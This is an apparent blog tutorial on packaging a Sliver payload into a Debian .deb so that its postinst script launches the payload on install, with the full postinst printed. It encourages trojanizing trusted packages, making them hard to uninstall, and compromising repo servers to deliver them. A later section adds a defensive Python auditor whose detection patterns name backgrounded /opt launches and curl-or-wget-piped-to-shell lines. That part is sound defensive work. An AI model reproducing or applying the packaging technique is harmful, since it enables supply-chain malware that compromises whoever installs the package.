Yes, it's late and I should be in bed, but I got to wondering a bit: how could you make a malware deb file?
So I thought it could be a fun little thing to try out, and it's pretty simple after all; it really doesn't take that long. And no, the result of this little tutorial is NOT uploaded to the repo ;)

Building packages and Packaging scripts to deb files are required reading, along with https://www.hivelocity.net/kb/what-are-preinst-postinst-prerm-and-postrm-script-2/

First, what are we trying to do? Make a package with a Sliver payload, package it into a deb file, so that when the deb is installed, the payload gets copied into place and executed. Pretty simple after all.
So, there are two files we could have a look at, and they are:

preinst

This script executes before the package is unpacked from its Debian archive (“.deb”) file. Many preinst scripts stop services for packages which are being upgraded, pausing them until the installation or upgrade is complete (and following the successful execution of the postinst script).

postinst

This script typically completes any required configuration of the package foo once foo has been unpacked from its Debian archive (“.deb”) file. Often, postinst scripts ask the user for input, and/or warn the user that if they accept the default values, they should remember to come back and re-configure the package, as the situation warrants. Many postinst scripts then execute any commands necessary to start or restart services once a new package has been successfully installed or upgraded.

Since we only need to execute it after it has been unpacked and copied into place, the postinst file is the one we want.

First, get the payload and put it into packagedir/data. Next we need the install file, and it looks like this:

data/* /opt/ 

It simply copies the payload into /opt, so we know where to find it later. And yes, we could write a systemd unit, start it and enable it, but that's for another tutorial; let's keep it simple.

Next up, we need to change the changelog, control and all the standard stuff, and last we need the postinst file, which looks like this:

cat -n postinst
     1	#!/bin/sh
     2	# postinst script for blackdragon-payloads-famous-quality
     3	#
     4	# see: dh_installdeb(1)
     5	
     6	set -e
     7	
     8	# summary of how this script can be called:
     9	#        * <postinst> `configure' <most-recently-configured-version>
    10	#        * <old-postinst> `abort-upgrade' <new version>
    11	#        * <conflictor's-postinst> `abort-remove' `in-favour' <package>
    12	#          <new-version>
    13	#        * <postinst> `abort-remove'
    14	#        * <deconfigured's-postinst> `abort-deconfigure' `in-favour'
    15	#          <failed-install-package> <version> `removing'
    16	#          <conflicting-package> <version>
    17	# for details, see https://www.debian.org/doc/debian-policy/ or
    18	# the debian-policy package
    19	
    20	
    21	case "$1" in
    22	    configure)
    23	    /opt/FAMOUS_QUALITY &
    24	    ;;
    25	
    26	    abort-upgrade|abort-remove|abort-deconfigure)
    27	    ;;
    28	
    29	    *)
    30	        echo "postinst called with unknown argument \`$1'" >&2
    31	        exit 1
    32	    ;;
    33	esac
    34	
    35	# dh_installdeb will replace this with shell code automatically
    36	# generated by other debhelper scripts.
    37	
    38	#DEBHELPER#
    39	
    40	exit 0

This is the entire file, but the only interesting part is line 23: there I changed the script to run our binary when the script argument is configure. It was a test to see whether this would work, and it does.
It starts the payload as soon as the deb gets installed.
We could now add a couple of uninstall cases and so on, but why bother. It's not meant to be uninstalled in an easy way :)

So, now you know how to make a malware deb. The next step would be to take a normal deb, unpack it, add our little surprise, and change the install and postinst scripts to launch the ordinary binary AND our own little gem ;)
But before you get excited, I would point out that this does leave a trace, and it's pretty obvious that this is malware. Let's see what it leaves us with. If we look at /var/lib/dpkg/info and grep for payloads (yes, lame name, I know):

[/var/lib/dpkg/info]
└─# ls -al | grep payloads   
-rw-r--r-- 1 root root     235 17 feb 12:21 blackdragon-payloads-famous-quality.list
-rw-r--r-- 1 root root     244 17 feb 05:58 blackdragon-payloads-famous-quality.md5sums
-rwxr-xr-x 1 root root    1001 17 feb 05:58 blackdragon-payloads-famous-quality.postinst

Let's see what's in the list file; it should be a list of all the files in the package:

cat blackdragon-payloads-famous-quality.list
/.
/opt
/opt/FAMOUS_QUALITY
/usr
/usr/share
/usr/share/doc
/usr/share/doc/blackdragon-payloads-famous-quality
/usr/share/doc/blackdragon-payloads-famous-quality/changelog.gz
/usr/share/doc/blackdragon-payloads-famous-quality/copyright

And it is. Now we know what files it left behind, so we can hunt them down and get rid of them.

And the postinst file from /var/lib/dpkg/info:

cat blackdragon-payloads-famous-quality.postinst
#!/bin/sh
# postinst script for blackdragon-payloads-famous-quality
#

set -e

case "$1" in
    configure)
    /opt/FAMOUS_QUALITY &
    ;;

    abort-upgrade|abort-remove|abort-deconfigure)
    ;;

    *)
        echo "postinst called with unknown argument \`$1'" >&2
        exit 1
    ;;
esac

So, not the most stealthy way of installing malware. There's also the point that every smart admin would only allow installing debs from known and trusted repos, so for this to work we would have to hack into the repo server, make a deb, and find some way to install it on the target, or patch a package they trust. So again, there are smarter ways to go about it ;)
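As an added example (my own code, not from this post or from any packaging tool), here is a small Python script that does what a careful admin would do before trusting a deb: it opens the outer ar archive, pulls the maintainer scripts out of control.tar.*, and flags the exact trick used above, a backgrounded launch of a binary dropped under /opt. The same audit_script function can be pointed at the copies dpkg keeps in /var/lib/dpkg/info, which is where the traces shown above turn up. The package name sample-pkg, the heuristic patterns and the in-memory sample deb are constructed for the demo; the embedded SAMPLE_POSTINST mirrors the postinst from this post.

```python
import io
import re
import tarfile

# A .deb is an "ar" archive holding debian-binary, control.tar.* and data.tar.*;
# the maintainer scripts (preinst/postinst/prerm/postrm) live in control.tar.*.
AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

def ar_members(blob):
    """Yield (name, data) for each ar member; accepts GNU 'name/' and plain padded names."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos = len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]          # fixed 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header at offset %d" % pos)
        name = hdr[0:16].decode("ascii").rstrip().rstrip("/")
        size = int(hdr[48:58].decode("ascii").strip())
        start = pos + 60
        yield name, blob[start:start + size]
        pos = start + size + (size % 2)   # members are padded to an even offset

def ar_build(members):
    """Build a minimal ar archive from (name, bytes) pairs; only used for the constructed sample."""
    out = bytearray(AR_MAGIC)
    for name, data in members:
        out += b"%-16s%-12d%-6d%-6d%-8s%-10d`\n" % (name.encode(), 0, 0, 0, b"100644", len(data))
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)

def maintainer_scripts(deb_bytes):
    """Return {script_name: text} for the maintainer scripts in control.tar.* (gz/bz2/xz, not zstd)."""
    scripts = {}
    for name, data in ar_members(deb_bytes):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for member in tf.getmembers():
                base = member.name.lstrip("./")
                if member.isfile() and base in MAINTAINER_SCRIPTS:
                    scripts[base] = tf.extractfile(member).read().decode("utf-8", "replace")
    return scripts

# Constructed review heuristics, written around the trick in the post. They are
# hints for a human reviewer, not proof that a script is malicious.
SUSPICIOUS = [
    (re.compile(r"^\s*[^#\s].*[^&\s]\s*&\s*$"), "command left running in the background with '&'"),
    (re.compile(r"^\s*(/opt|/tmp|/var/tmp|/dev/shm)/\S+"), "runs a binary from a non-standard or world-writable path"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "pipes downloaded content into a shell"),
    (re.compile(r"\b(nohup|setsid|disown)\b"), "detaches a process from the dpkg run"),
]

def audit_script(text):
    """Return [(line_no, reason, line)] for every non-comment line matching a heuristic."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(line):
                findings.append((lineno, reason, stripped))
    return findings

def audit_deb(deb_bytes):
    """Audit a .deb before installing it: {script_name: findings}, empty when nothing is flagged."""
    report = {}
    for name, text in maintainer_scripts(deb_bytes).items():
        findings = audit_script(text)
        if findings:
            report[name] = findings
    return report

# Constructed sample postinst mirroring the one in the post (hypothetical package, not a real file).
SAMPLE_POSTINST = """#!/bin/sh
set -e
case "$1" in
    configure)
    /opt/FAMOUS_QUALITY &
    ;;
    *)
        echo "postinst called with unknown argument \\`$1'" >&2
        exit 1
    ;;
esac
exit 0
"""

def build_sample_deb(postinst_text):
    """Construct a tiny in-memory .deb (control + postinst, empty data tree) for the demo."""
    control = "Package: sample-pkg\nVersion: 0.1\nArchitecture: all\nMaintainer: nobody\nDescription: sample\n"
    ctrl_buf, data_buf = io.BytesIO(), io.BytesIO()
    with tarfile.open(fileobj=ctrl_buf, mode="w:gz") as tf:
        for name, text, mode in (("control", control, 0o644), ("postinst", postinst_text, 0o755)):
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode = len(text.encode()), mode
            tf.addfile(info, io.BytesIO(text.encode()))
    with tarfile.open(fileobj=data_buf, mode="w:gz"):
        pass
    return ar_build([("debian-binary", b"2.0\n"), ("control.tar.gz", ctrl_buf.getvalue()),
                     ("data.tar.gz", data_buf.getvalue())])

if __name__ == "__main__":
    for script, findings in audit_deb(build_sample_deb(SAMPLE_POSTINST)).items():
        for lineno, reason, line in findings:
            print("%s:%d: %s: %s" % (script, lineno, reason, line))
```

Run against the constructed sample it reports line 5 of postinst twice (backgrounded, and launched from /opt), and nothing for a postinst that only runs exit 0. To check a real package, read the .deb into bytes and pass it to audit_deb; to check what is already installed, feed each *.postinst and friends from /var/lib/dpkg/info through audit_script.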


Much Happy maldeb'ing :)